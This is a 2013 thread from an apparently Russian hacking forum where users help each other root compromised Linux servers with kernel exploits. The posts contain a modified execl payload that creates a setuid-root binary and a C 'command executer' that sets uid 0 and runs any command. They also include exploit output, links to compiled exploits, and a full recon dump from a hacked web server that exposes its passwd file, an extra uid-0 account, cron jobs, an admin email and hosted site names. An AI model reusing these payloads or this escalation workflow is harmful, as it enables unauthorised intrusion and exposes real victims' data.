Старый 16.11.2013, 05:42   #1011
QaRTiN
 
Регистрация: 22.08.2010
Сообщений: 54
Репутация: 0
По умолчанию

Цитата:
Сообщение от Pashkela Посмотреть сообщение
а что пробовал?

Если

https://rdot.org/forum/showthread.php?t=2720

не идет - забудь
там gcc нет(
есть ли другой способ заюзать этот сплоит?
или мб кто-то сможет скомпилить этот сплоит на похожей машине?
QaRTiN вне форума   Ответить с цитированием
Старый 16.11.2013, 14:25   #1012
Pashkela
 
Аватар для Pashkela
 
Регистрация: 05.07.2010
Сообщений: 1,243
По умолчанию

попробуй добавить опцию

-static

и компиль у себя
Pashkela вне форума   Ответить с цитированием
Старый 19.11.2013, 18:02   #1013
QaRTiN
 
Регистрация: 22.08.2010
Сообщений: 54
Репутация: 0
По умолчанию

Цитата:
Сообщение от Pashkela Посмотреть сообщение
попробуй добавить опцию

-static

и компиль у себя
пробывал на разных машинах - не компилится со -static

Pashkela,если не трудно,можешь скинуть скомпиленный сплоит,плз?
QaRTiN вне форума   Ответить с цитированием
Старый 19.11.2013, 23:59   #1014
banned
 
Регистрация: 12.11.2013
Сообщений: 4
Репутация: 0
По умолчанию

может ли многоуважаемый Pashkela, либо кто-то другой объяснить порядок действий по abacus и его run.sh, если на сервере отсутствует gcc?
компилил на другом сервере измененный мною run.sh.
это:
Код:
execl("/bin/sh", "sh", "-c", "echo '#include <stdio.h>\nint main(int argc, char *argv[])\n{setuid(0);setgid(0);system(argv[1]);return 0;}' > suid.c; gcc suid.c -o suid;chown 0:0 suid; chmod +s suid; rm suid.c;./suid \"rm exp_abacus.so exploit exp_abacus.c exploit.c\";./suid \"ls -la;id\"", NULL);
я заменил на:
Код:
execl("/bin/bash","/bin/bash", "-c", "cp ./exec ./exec2; chown root ./exec2; chgrp root ./exec2; chmod 755 ./exec2; chmod +s ./exec2;", NULL);
и скомпилил обычным запуском:
Цитата:
chmod 755 run.sh;sh run.sh
а также exec.c:
Код:
/* Command executer; Coded by Grey; */
#include <stdio.h>
#include <stdlib.h>
main(int argc, char *argv[])
{
if(argc == 2) {
setgid(0); setuid(0);
system(argv[1]); }
return 0;
}
скомпилил обычным образом.

на выходе получились 3 файла: exp_abacus.so, exploit, exec.

копирую все на сервер без gcc, и пробую запустить:
Код:
./exploit
 [+] Resolved set_fs_root to 0xffffffff811b3230 (via System.map)
 [+] Resolved set_fs_pwd to 0xffffffff811b31c0 (via System.map)
 [+] Resolved __virt_addr_valid to 0xffffffff8104bc90 (via System.map)
 [+] Resolved init_task to 0xffffffff81a8d020 (via System.map)
 [+] Resolved init_fs to 0xffffffff81ad4c80 (via System.map)
 [+] Resolved default_exec_domain to 0xffffffff81a9a8a0 (via System.map)
 [+] Resolved bad_file_ops to 0xffffffff81621300 (via System.map)
 [+] Resolved bad_file_aio_read to 0xffffffff8119ec80 (via System.map)
 [+] Resolved ima_audit to 0xffffffff81fd4c7c (via System.map)
 [+] Resolved ima_file_mmap to 0xffffffff8123fbf0 (via System.map)
 [+] Resolved ima_bprm_check to 0xffffffff8123fbb0 (via System.map)
 [+] Resolved ima_file_check to 0xffffffff8123fb80 (via System.map)
 [+] Resolved selinux_enforcing to 0xffffffff81fd04c4 (via System.map)
 [+] Resolved selinux_enabled to 0xffffffff81ae28c0 (via System.map)
 [+] Resolved security_ops to 0xffffffff81fcec58 (via System.map)
 [+] Resolved default_security_ops to 0xffffffff81aded40 (via System.map)
 [+] Resolved sel_read_enforce to 0xffffffff8122c310 (via System.map)
 [+] Resolved audit_enabled to 0xffffffff81ed6ac4 (via System.map)
 [+] Resolved commit_creds to 0xffffffff8109e6a0 (via System.map)
 [+] Resolved prepare_kernel_cred to 0xffffffff8109e920 (via System.map)
 [+] Resolved xen_start_info to 0xffffffff81ddf308 (via System.map)
 [+] Resolved ptmx_fops to 0xffffffff81fdda60 (via System.map)
 [+] Resolved mark_rodata_ro to 0xffffffff810459f0 (via System.map)
 [+] Resolved set_kernel_text_ro to 0xffffffff81045b80 (via System.map)
 [+] Resolved make_lowmem_page_readonly to 0xffffffff81005770 (via System.map)
 [+] Resolved make_lowmem_page_readwrite to 0xffffffff81005720 (via System.map)
т.е. все вроде говорит об успехе, но суидник exec2 не создается, или я так понимаю что просто не доходит до команды создания.

все ли я делаю правильно или что я делаю не так?
banned вне форума   Ответить с цитированием
Старый 20.11.2013, 01:04   #1015
b3
 
Аватар для b3
 
Регистрация: 18.08.2010
Сообщений: 352
Репутация: 105
По умолчанию

По поводу GCC, в 95% он есть ну или был, и его не удалили как пакет а просто убрали права, перенесли/удалили только главный бинарник и хватает просто закинуть в текущую папку бинарь и скомпилить ./gcc sploit.c

QaRTiN
http://www.sendspace.com/file/2w2w60 - сучки статик
http://www.sendspace.com/file/1bi8gh - семтекс
b3 вне форума   Ответить с цитированием
Старый 20.11.2013, 19:47   #1016
Pashkela
 
Аватар для Pashkela
 
Регистрация: 05.07.2010
Сообщений: 1,243
По умолчанию

Цитата:
все ли я делаю правильно или что я делаю не так?
а как ответить - угадать? Какая система? Где компилил - на точно такой же? Если нет - применял опцию -static? На целевой системе есть /bin/bash? Где uname -a?

Поясню, как выглядит вопрос, к примеру, в моих глазах:

"хочу порутать хз что, решил выбрать abacus, но там хз-где, нет gcc, поэтому я скомпилил у себя - хз какая система, и пытаюсь запустить там - на хз какой системе, я прав или ошибаюсь?"
Pashkela вне форума   Ответить с цитированием
Старый 04.12.2013, 01:15   #1017
Faaax
 
Аватар для Faaax
 
Регистрация: 03.04.2012
Сообщений: 94
Репутация: 6
По умолчанию

Код:
================================================
uname -a
================================================
Linux  3.2.0-4-amd64 #1 SMP Debian 3.2.46-1 x86_64 GNU/Linux

================================================
mount
================================================
sysfs on /sys type sysfs (rw,nosuid,nodev,noexec,relatime)
proc on /proc type proc (rw,nosuid,nodev,noexec,relatime)
udev on /dev type devtmpfs (rw,relatime,size=10240k,nr_inodes=4109552,mode=755)
devpts on /dev/pts type devpts (rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=000)
tmpfs on /run type tmpfs (rw,nosuid,noexec,relatime,size=3295496k,mode=755)
/dev/disk/by-uuid/a232fd1b-92f7-4ba2-a46f-37822851e57f on / type ext4 (rw,noatime,errors=remount-ro,user_xattr,barrier=1,data=ordered,usrquota)
tmpfs on /run/lock type tmpfs (rw,nosuid,nodev,noexec,relatime,size=5120k)
tmpfs on /run/shm type tmpfs (rw,nosuid,nodev,noexec,relatime,size=8190260k)
/dev/md0 on /boot type ext2 (rw,relatime,errors=continue)
tmpfs on /mtmp type tmpfs (rw,nosuid,nodev,noexec,noatime,size=2097152k)

================================================
df -h
================================================
Filesystem                                              Size  Used Avail Use% Mounted on
rootfs                                                  1.8T  703G  1.1T  41% /
udev                                                     10M     0   10M   0% /dev
tmpfs                                                   3.2G   44M  3.2G   2% /run
/dev/disk/by-uuid/a232fd1b-92f7-4ba2-a46f-37822851e57f  1.8T  703G  1.1T  41% /
tmpfs                                                   5.0M     0  5.0M   0% /run/lock
tmpfs                                                   7.9G     0  7.9G   0% /run/shm
/dev/md0                                                458M   18M  416M   5% /boot
tmpfs                                                   2.0G  305M  1.8G  15% /mtmp

================================================
ls -la /boot
================================================
total 15705
drwxr-xr-x  4 root root     1024 Aug 26 17:59 .
drwxr-xr-x 26 root root     4096 Sep  4 23:08 ..
-rw-r--r--  1 root root  2107832 Jun  9 22:47 System.map-3.2.0-4-amd64
-rw-r--r--  1 root root   129065 Jun  9 22:47 config-3.2.0-4-amd64
drwxr-xr-x  3 root root     5120 Aug 26 18:01 grub
-rw-r--r--  1 root root 10917727 Aug 26 17:57 initrd.img-3.2.0-4-amd64
drwxr-xr-x  2 root root    12288 Aug 26 17:43 lost+found
-rw-r--r--  1 root root  2835648 Jun  9 22:35 vmlinuz-3.2.0-4-amd64

================================================
cat /proc/version
================================================
Linux version 3.2.0-4-amd64 (debian-kernel@lists.debian.org) (gcc version 4.6.3 (Debian 4.6.3-14) ) #1 SMP Debian 3.2.46-1

================================================
pwd
================================================
/tmp

================================================
id
================================================
uid=33(www-data) gid=33(www-data) groups=33(www-data)

================================================
whoami
================================================
www-data

================================================
cat /etc/passwd
================================================
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
Debian-exim:x:101:103::/var/spool/exim4:/bin/false
statd:x:102:65534::/var/lib/nfs:/bin/false
postfix:x:103:107::/var/spool/postfix:/bin/false
messagebus:x:104:109::/var/run/dbus:/bin/false
sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin
guru:x:0:0::/root:/bin/bash
mysql:x:106:110:MySQL Server,,,:/nonexistent:/bin/false
zabbix:x:107:111::/var/run/zabbix/:/bin/false
ntp:x:108:112::/home/ntp:/bin/false
tmpftp:x:33:33::/var/www:/bin/date
proftpd:x:109:65534::/var/run/proftpd:/bin/false
ftp:x:110:65534::/srv/ftp:/bin/false
zhenskoemnenie:x:1000:1000::/var/www/zhenskoe-mnenie:/bin/date
lifestyleladies:x:1001:1001::/var/www/lifestyleladies:/bin/date
womantalks:x:1002:1002::/var/www/womantalks:/bin/date
clamav:x:111:113::/var/lib/clamav:/bin/false
ossec:x:1003:1003::/var/ossec:/bin/false
ossecm:x:1004:1003::/var/ossec:/bin/false
ossecr:x:1005:1003::/var/ossec:/bin/false
portal-woman:x:33:33::/var/www/portal-woman:/bin/date

================================================
cat /etc/issue
================================================
Debian GNU/Linux 7 \n \l


================================================
cat /etc/issue.net
================================================
Debian GNU/Linux 7

================================================
cat /proc/sys/vm/mmap_min_addr
================================================
65536

================================================
cat /etc/crontab
================================================
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user	command
17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 2	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 2	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 2	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
0  4 * * *   root    clamscan -ri /var/www |mail -s "clamav on s1.zhenskoe-mnenie.ru" security-guru@yandex.ru
#

================================================
ls -la /etc/cron.d
================================================
total 24
drwxr-xr-x  2 root root 4096 Aug 28 20:24 .
drwxr-xr-x 96 root root 4096 Dec  2 15:52 ..
-rw-r--r--  1 root root  102 Jul  4  2012 .placeholder
-rw-r--r--  1 root root  105 Jun 25  2012 atop
-rw-r--r--  1 root root  589 Jan 24  2013 mdadm
-rw-r--r--  1 root root  565 Jul 17 19:05 php5

================================================
ls -la /etc/cron.hourly
================================================
total 12
drwxr-xr-x  2 root root 4096 Aug 26 17:48 .
drwxr-xr-x 96 root root 4096 Dec  2 15:52 ..
-rw-r--r--  1 root root  102 Jul  4  2012 .placeholder

================================================
ls -la /etc/cron.monthly
================================================
total 16
drwxr-xr-x  2 root root 4096 Sep  5 00:38 .
drwxr-xr-x 96 root root 4096 Dec  2 15:52 ..
-rw-r--r--  1 root root  102 Jul  4  2012 .placeholder
-rwxr-xr-x  1 root root  809 Sep  4 23:29 zzfilesbackup

================================================
ls -la /etc/cron.weekly
================================================
total 16
drwxr-xr-x  2 root root 4096 Aug 26 17:48 .
drwxr-xr-x 96 root root 4096 Dec  2 15:52 ..
-rw-r--r--  1 root root  102 Jul  4  2012 .placeholder
-rwxr-xr-x  1 root root  907 Jun 19  2012 man-db

================================================
ls -la /etc
================================================
total 848
drwxr-xr-x 96 root   root    4096 Dec  2 15:52 .
drwxr-xr-x 26 root   root    4096 Sep  4 23:08 ..
-rw-------  1 root   root       0 Aug 26 17:46 .pwd.lock
-rw-r--r--  1 root   root    4565 Aug 24  2012 Muttrc
drwxr-xr-x  2 root   root    4096 Aug 26 17:56 Muttrc.d
drwxr-xr-x  3 root   root    4096 Aug 26 17:51 X11
drwxr-xr-x  3 root   root    4096 Aug 26 17:50 acpi
-rw-r--r--  1 root   root    2981 Aug 26 17:48 adduser.conf
-rw-r--r--  1 root   root      44 Aug 27 01:21 adjtime
-rw-r--r--  1 root   root     231 Oct  1 13:20 aliases
-rw-r--r--  1 root   root   12288 Oct  1 13:20 aliases.db
drwxr-xr-x  2 root   root    4096 Aug 29 00:43 alternatives
drwxr-xr-x  7 root   root    4096 Aug 28 01:23 apache2
drwxr-xr-x  6 root   root    4096 Aug 26 17:55 apt
-rw-r-----  1 root   daemon   144 Jun  9  2012 at.deny
drwxr-x---  3 root   root    4096 Aug 28 14:04 audisp
drwxr-x---  2 root   root    4096 Aug 28 14:05 audit
-rw-r--r--  1 root   root    1895 Dec 30  2012 bash.bashrc
-rw-r--r--  1 root   root      45 Jun 17  2012 bash_completion
drwxr-xr-x  2 root   root    4096 Aug 26 18:16 bash_completion.d
-rw-r--r--  1 root   root     356 Dec 30  2012 bindresvport.blacklist
-rw-r--r--  1 root   root    1338 Aug 26 18:01 blkid.tab
-rw-r--r--  1 root   root    1338 Aug 26 18:01 blkid.tab.old
drwxr-xr-x  3 root   root    4096 Aug 26 17:54 ca-certificates
-rw-r--r--  1 root   root    7134 Aug 26 17:56 ca-certificates.conf
drwxr-xr-x  2 root   root    4096 Aug 26 17:48 calendar
drwxr-xr-x  4 root   root    4096 Oct  1 13:20 clamav
drwxr-xr-x  2 root   root    4096 Aug 26 17:51 console-setup
drwxr-xr-x  2 root   root    4096 Aug 28 20:24 cron.d
drwxr-xr-x  2 root   root    4096 Sep 11 23:36 cron.daily
drwxr-xr-x  2 root   root    4096 Aug 26 17:48 cron.hourly
drwxr-xr-x  2 root   root    4096 Sep  5 00:38 cron.monthly
drwxr-xr-x  2 root   root    4096 Aug 26 17:48 cron.weekly
-rw-r--r--  1 root   root     832 Dec  2 15:52 crontab
drwxr-xr-x  2 root   root    4096 Aug 28 20:25 dbconfig-common
-rw-r--r--  1 root   root    2969 Dec 26  2012 debconf.conf
-rw-r--r--  1 root   root       4 Jun  3  2013 debian_version
drwxr-xr-x  2 root   root    4096 Oct  2 10:20 default
-rw-r--r--  1 root   root     604 May 16  2012 deluser.conf
drwxr-xr-x  3 root   root    4096 Aug 28 01:01 dhcp
drwxr-xr-x  2 root   root    4096 Aug 26 17:57 dictionaries-common
-rw-r--r--  1 root   root     346 Apr  7  2012 discover-modprobe.conf
drwxr-xr-x  2 root   root    4096 Aug 26 17:52 discover.conf.d
drwxr-xr-x  4 root   root    4096 Aug 26 18:25 dpkg
drwxr-xr-x  3 root   root    4096 Aug 26 17:54 emacs
-rw-r--r--  1 root   root       0 Aug 26 17:46 environment
drwxr-xr-x  4 root   root    4096 Oct  2 12:51 fail2ban
drwxr-xr-x  4 root   root    4096 Aug 27 23:23 fonts
-rw-r--r--  1 root   root     821 Aug 29 01:16 fstab
drwxr-xr-x  2 root   root    4096 Dec 11  2012 fstab.d
-rw-r--r--  1 root   root     132 Apr 16  2013 ftpusers
-rw-r--r--  1 root   root    2940 Dec 30  2012 gai.conf
drwxr-xr-x  2 root   root    4096 Oct  2 10:20 gamin
drwxr-xr-x  2 root   root    4096 Aug 26 17:48 groff
-rw-r--r--  1 root   root     718 Oct  1 13:26 group
-rw-------  1 root   root     704 Oct  1 13:20 group-
drwxr-xr-x  2 root   root    4096 Aug 26 17:59 grub.d
-rw-r-----  1 root   shadow   591 Oct  1 13:26 gshadow
-rw-------  1 root   root     581 Oct  1 13:20 gshadow-
-rw-r--r--  1 root   root       9 Aug  7  2006 host.conf
-rw-r--r--  1 root   root      22 Sep  4 12:29 hostname
-rw-r--r--  1 root   root      72 Aug 25 21:47 hosts
-rw-r--r--  1 root   root     580 Aug 26 17:55 hosts.allow
-rw-r--r--  1 root   root     880 Aug 26 17:55 hosts.deny
lrwxrwxrwx  1 root   root       7 Aug 28 01:24 httpd -> apache2
drwxr-xr-x  2 root   root    4096 Aug 26 17:59 init
drwxr-xr-x  2 root   root    4096 Oct  2 10:20 init.d
drwxr-xr-x  5 root   root    4096 Aug 26 17:49 initramfs-tools
-rw-r--r--  1 root   root    2008 Feb  8  2013 inittab
-rw-r--r--  1 root   root    1721 Dec 31  2012 inputrc
drwxr-xr-x  3 root   root    4096 Aug 26 17:43 insserv
-rw-r--r--  1 root   root     859 Nov 24  2012 insserv.conf
drwxr-xr-x  2 root   root    4096 Aug 26 18:00 insserv.conf.d
drwxr-xr-x  2 root   root    4096 Aug 26 17:48 iproute2
-rw-r--r--  1 root   root      26 Jun  3  2013 issue
-rw-r--r--  1 root   root      19 Jun  3  2013 issue.net
drwxr-xr-x  2 root   root    4096 Aug 26 17:51 kbd
drwxr-xr-x  4 root   root    4096 Aug 26 17:49 kernel
-rw-r--r--  1 root   root     144 Aug 26 17:59 kernel-img.conf
-rw-r--r--  1 root   root   21521 Oct  2 10:20 ld.so.cache
-rw-r--r--  1 root   root      34 Aug 26 17:43 ld.so.conf
drwxr-xr-x  2 root   root    4096 Aug 28 00:31 ld.so.conf.d
drwxr-xr-x  2 root   root    4096 Aug 26 17:55 ldap
-rw-r--r--  1 root   root     191 Jan 31  2012 libaudit.conf
drwxr-xr-x  2 root   root    4096 Aug 26 17:58 libnl-3
-rw-r--r--  1 root   root    2502 Aug  1 19:15 locale.alias
-rw-r--r--  1 root   root    8567 Aug 28 00:32 locale.gen
-rw-r--r--  1 root   root    1448 Aug 28 01:00 localtime
drwxr-xr-x  6 root   root    4096 Aug 26 21:03 logcheck
-rw-r--r--  1 root   root   10185 May 26  2012 login.defs
-rw-r--r--  1 root   root     599 Feb 19  2009 logrotate.conf
drwxr-xr-x  2 root   root    4096 Oct  2 10:20 logrotate.d
drwxr-xr-x  4 root   root    4096 Sep  4 13:54 logwatch
-rw-r--r--  1 root   root     111 Jun 30  2012 magic
-rw-r--r--  1 root   root     111 Jun 30  2012 magic.mime
-rw-r--r--  1 root   root     125 Nov 21  2011 mail.rc
-rw-r--r--  1 root   root    2371 Aug 26 18:16 mailcap
-rw-r--r--  1 root   root     449 Feb 13  2012 mailcap.order
-rw-r--r--  1 root   root      19 Aug 25 22:10 mailname
-rw-r--r--  1 root   root    5173 Jun 19  2012 manpath.config
drwxr-xr-x  2 root   root    4096 Aug 26 18:16 mc
drwxr-xr-x  2 root   root    4096 Aug 26 17:49 mdadm
-rw-r--r--  1 root   root   24269 Feb 13  2012 mime.types
-rw-r--r--  1 root   root     956 Mar 21  2013 mke2fs.conf
drwxr-xr-x  2 root   root    4096 Aug 26 17:49 modprobe.d
drwxr-xr-x  2 root   root    4096 Aug 26 18:16 modsecurity
-rw-r--r--  1 root   root     253 Aug 26 17:49 modules
-rw-r--r--  1 root   root     497 Aug 26 18:00 motd
lrwxrwxrwx  1 root   root      12 Aug 26 18:02 mtab -> /proc/mounts
drwxr-xr-x  3 root   root    4096 Sep  3 11:56 mysql
-rw-r--r--  1 root   root    8453 Jun 23  2012 nanorc
drwxr-xr-x  6 root   root    4096 Aug 26 18:02 network
-rw-r--r--  1 root   root      60 Aug 26 17:48 networks
drwxr-xr-x  5 root   root    4096 Sep 28 23:11 nginx
drwxr-xr-x  2 root   root    4096 Aug 26 18:26 nginx.orig
-rw-r--r--  1 root   root     475 Aug 28  2006 nsswitch.conf
-rw-r--r--  1 root   root    1988 May 12  2012 ntp.conf
drwxr-xr-x  2 root   root    4096 Aug 26 17:43 opt
-rw-r--r--  1 root   root     250 Jun  3  2013 os-release
-rw-------  1 root   root      87 Oct  1 13:27 ossec-init.conf
-rw-r--r--  1 root   root     552 Apr 29  2012 pam.conf
drwxr-xr-x  2 root   root    4096 Aug 28 14:04 pam.d
-rw-r--r--  1 root   root    1693 Oct 12 15:51 passwd
-rw-------  1 root   root    1639 Oct  1 13:26 passwd-
drwxr-xr-x  4 root   root    4096 Aug 26 17:53 perl
-rw-r--r--  1 root   root    5296 Aug 28 16:53 php-fpm.conf
drwxr-xr-x  6 root   root    4096 Aug 27 00:19 php5
drwxr-xr-x  4 root   root    4096 Aug 26 23:47 php52
drwxr-xr-x  2 root   root    4096 Aug 28 20:38 phpmyadmin
drwxr-xr-x  3 root   root    4096 Aug 26 18:00 postfix
drwxr-xr-x  4 root   root    4096 Aug 26 17:57 ppp
-rw-r--r--  1 root   root     851 Jul 29  2011 profile
drwxr-xr-x  2 root   root    4096 Aug 26 18:00 profile.d
drwxr-xr-x  3 root   root    4096 Aug 28 01:40 proftpd
-rw-r--r--  1 root   root    2933 May 14  2012 protocols
drwxr-xr-x  2 root   root    4096 Aug 26 17:55 python
drwxr-xr-x  2 root   root    4096 Aug 26 17:56 python2.6
drwxr-xr-x  2 root   root    4096 Aug 26 17:55 python2.7
-rw-r--r--  1 root   root     220 Mar 18  2013 quotagrpadmins
-rw-r--r--  1 root   root     526 Mar 18  2013 quotatab
-rwxr-xr-x  1 root   root     306 Aug 26 17:46 rc.local
drwxr-xr-x  2 root   root    4096 Oct  3 08:20 rc0.d
drwxr-xr-x  2 root   root    4096 Oct  3 08:20 rc1.d
drwxr-xr-x  2 root   root    4096 Oct  3 08:20 rc2.d
drwxr-xr-x  2 root   root    4096 Oct  3 08:20 rc3.d
drwxr-xr-x  2 root   root    4096 Oct  3 08:20 rc4.d
drwxr-xr-x  2 root   root    4096 Oct  3 08:20 rc5.d
drwxr-xr-x  2 root   root    4096 Oct  3 08:20 rc6.d
drwxr-xr-x  2 root   root    4096 Aug 26 18:16 rcS.d
-rw-r--r--  1 root   root    3173 Mar 13  2013 reportbug.conf
-rw-r--r--  1 root   root     107 Aug 26 18:00 resolv.conf
drwxr-xr-x  3 root   root    4096 Aug 26 17:57 resolvconf
-rwxr-xr-x  1 root   root     268 Dec 31  2012 rmt
-rw-r--r--  1 root   root     887 May 14  2012 rpc
-rw-r--r--  1 root   root    2632 Mar  6  2013 rsyslog.conf
drwxr-xr-x  2 root   root    4096 Aug 26 17:57 rsyslog.d
-rw-r--r--  1 root   root    3663 Sep 16  2012 screenrc
-rw-r--r--  1 root   root    3964 May 26  2012 securetty
drwxr-xr-x  4 root   root    4096 Aug 26 17:46 security
drwxr-xr-x  2 root   root    4096 Aug 26 17:45 selinux
-rw-r--r--  1 root   root   19398 May 14  2012 services
drwxr-xr-x  2 root   root    4096 Aug 26 17:57 sgml
-rw-r-----  1 root   shadow  1704 Oct 12 15:52 shadow
-rw-------  1 root   root    1573 Oct 12 15:50 shadow-
-rw-r--r--  1 root   root      98 Aug 28 01:40 shells
drwxr-xr-x  2 root   root    4096 Aug 26 17:46 skel
-rw-r--r--  1 root   root    7059 Jun 19  2011 smartd.conf
drwxr-xr-x  3 root   root    4096 Aug 26 17:58 smartmontools
drwxr-xr-x  2 root   root    4096 Aug 26 17:59 ssh
drwxr-xr-x  4 root   root    4096 Aug 26 17:56 ssl
-rw-r--r--  1 root   root     771 Jun  9  2012 staff-group-for-usr-local
-rw-r--r--  1 root   root    2820 Aug 29 01:57 sysctl.conf
drwxr-xr-x  2 root   root    4096 Aug 29 01:56 sysctl.d
drwxr-xr-x  3 root   root    4096 Aug 26 17:47 systemd
drwxr-xr-x  2 root   root    4096 Aug 26 17:45 terminfo
drwxr-xr-x  3 root   root    4096 Aug 26 17:54 texmf
-rw-r--r--  1 root   root      14 Aug 28 01:00 timezone
-rw-r--r--  1 root   root    1260 May 30  2008 ucf.conf
drwxr-xr-x  4 root   root    4096 Aug 26 17:48 udev
drwxr-xr-x  3 root   root    4096 Aug 26 17:57 ufw
-rw-r--r--  1 root   root     284 Sep 25  2010 updatedb.conf
drwxr-xr-x  2 root   root    4096 Aug 26 18:00 vim
drwxr-xr-x  2 root   root    4096 Aug 26 17:56 w3m
-rw-r--r--  1 root   root     314 Mar 18  2013 warnquota.conf
-rw-r--r--  1 root   root    4496 Apr  9  2012 wgetrc
drwxr-xr-x  2 root   root    4096 Aug 26 17:57 xml
drwxr-xr-x  3 zabbix zabbix  4096 Sep  3 00:06 zabbix
drwxr-xr-x  3 root   root    4096 Aug 28 00:32 zabbix-orig

================================================
ls -la --full-time /lib
================================================
total 416
drwxr-xr-x 13 root root  4096 2013-08-28 14:04:09.244470212 +0400 .
drwxr-xr-x 26 root root  4096 2013-09-04 23:08:39.705435139 +0400 ..
lrwxrwxrwx  1 root root    21 2013-08-26 18:25:54.006452210 +0400 cpp -> /etc/alternatives/cpp
drwxr-xr-x  2 root root  4096 2013-08-26 17:52:03.952769106 +0400 discover
drwxr-xr-x  4 root root  4096 2013-08-26 17:49:27.872775972 +0400 firmware
drwxr-xr-x  2 root root  4096 2013-08-26 17:44:45.824788461 +0400 init
-rwxr-xr-x  1 root root 72184 2012-11-12 20:58:05.000000000 +0400 klibc-2xtYrByCrj5OEwaInv4tMSjej98.so
lrwxrwxrwx  1 root root    17 2012-01-31 19:40:49.000000000 +0400 libaudit.so.0 -> libaudit.so.0.0.0
-rw-r--r--  1 root root 96616 2012-01-31 19:40:50.000000000 +0400 libaudit.so.0.0.0
lrwxrwxrwx  1 root root    19 2012-01-31 19:40:49.000000000 +0400 libauparse.so.0 -> libauparse.so.0.0.0
-rw-r--r--  1 root root 55760 2012-01-31 19:40:50.000000000 +0400 libauparse.so.0.0.0
lrwxrwxrwx  1 root root    17 2013-03-01 17:55:02.000000000 +0400 libip4tc.so.0 -> libip4tc.so.0.1.0
-rw-r--r--  1 root root 31384 2013-03-01 17:55:04.000000000 +0400 libip4tc.so.0.1.0
lrwxrwxrwx  1 root root    17 2013-03-01 17:55:02.000000000 +0400 libip6tc.so.0 -> libip6tc.so.0.1.0
-rw-r--r--  1 root root 31448 2013-03-01 17:55:04.000000000 +0400 libip6tc.so.0.1.0
lrwxrwxrwx  1 root root    15 2013-03-01 17:55:02.000000000 +0400 libipq.so.0 -> libipq.so.0.0.0
-rw-r--r--  1 root root 10544 2013-03-01 17:55:04.000000000 +0400 libipq.so.0.0.0
lrwxrwxrwx  1 root root    16 2013-03-01 17:55:02.000000000 +0400 libiptc.so.0 -> libiptc.so.0.0.0
-rw-r--r--  1 root root  5928 2013-03-01 17:55:04.000000000 +0400 libiptc.so.0.0.0
lrwxrwxrwx  1 root root    19 2013-03-01 17:55:02.000000000 +0400 libxtables.so.7 -> libxtables.so.7.0.0
-rw-r--r--  1 root root 47824 2013-03-01 17:55:04.000000000 +0400 libxtables.so.7.0.0
drwxr-xr-x  3 root root  4096 2013-08-26 17:44:56.648787906 +0400 lsb
drwxr-xr-x  2 root root  4096 2013-08-26 17:47:11.332782000 +0400 modprobe.d
drwxr-xr-x  3 root root  4096 2013-08-26 17:50:06.168774290 +0400 modules
drwxr-xr-x  3 root root  4096 2013-08-26 17:47:49.780780291 +0400 systemd
drwxr-xr-x 15 root root  4096 2013-08-26 17:43:44.388791087 +0400 terminfo
drwxr-xr-x  5 root root  4096 2013-08-26 17:47:54.368780109 +0400 udev
drwxr-xr-x  3 root root 12288 2013-08-28 00:31:53.966333388 +0400 x86_64-linux-gnu
drwxr-xr-x  2 root root  4096 2013-08-26 17:47:06.212782209 +0400 xtables

================================================
ls -la --full-time /lib64
================================================
total 8
drwxr-xr-x  2 root root 4096 2013-08-28 00:31:53.966333388 +0400 .
drwxr-xr-x 26 root root 4096 2013-09-04 23:08:39.705435139 +0400 ..
lrwxrwxrwx  1 root root   32 2013-08-01 19:19:28.000000000 +0400 ld-linux-x86-64.so.2 -> /lib/x86_64-linux-gnu/ld-2.17.so

================================================
cat /proc/cpuinfo
================================================
processor	: 0
vendor_id	: AuthenticAMD
cpu family	: 21
model		: 1
model name	: AMD Opteron(tm) Processor 3280                 
stepping	: 2
microcode	: 0x6000623
cpu MHz		: 1400.000
cache size	: 2048 KB
physical id	: 0
siblings	: 8
core id		: 0
cpu cores	: 4
apicid		: 16
initial apicid	: 0
fpu		: yes
fpu_exception	: yes
cpuid level	: 13
wp		: yes
flags		: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ht syscall nx mmxext fxsr_opt pdpe1gb rdtscp lm constant_tsc rep_good nopl nonstop_tsc extd_apicid aperfmperf pni pclmulqdq monitor ssse3 cx16 sse4_1 sse4_2 popcnt aes xsave avx lahf_lm cmp_legacy svm extapic cr8_legacy abm sse4a misalignsse 3dnowprefetch osvw ibs xop skinit wdt lwp fma4 nodeid_msr topoext perfctr_core arat cpb hw_pstate npt lbrv svm_lock nrip_save tsc_scale vmcb_clean flushbyasid decodeassists pausefilter pfthreshold
bogomips	: 4799.47
TLB size	: 1536 4K pages
clflush size	: 64
cache_alignment	: 64
address sizes	: 48 bits physical, 48 bits virtual
power management: ts ttp tm 100mhzsteps hwpstate [9]

processor	: 1
vendor_id	: AuthenticAMD
cpu family	: 21
model		: 1
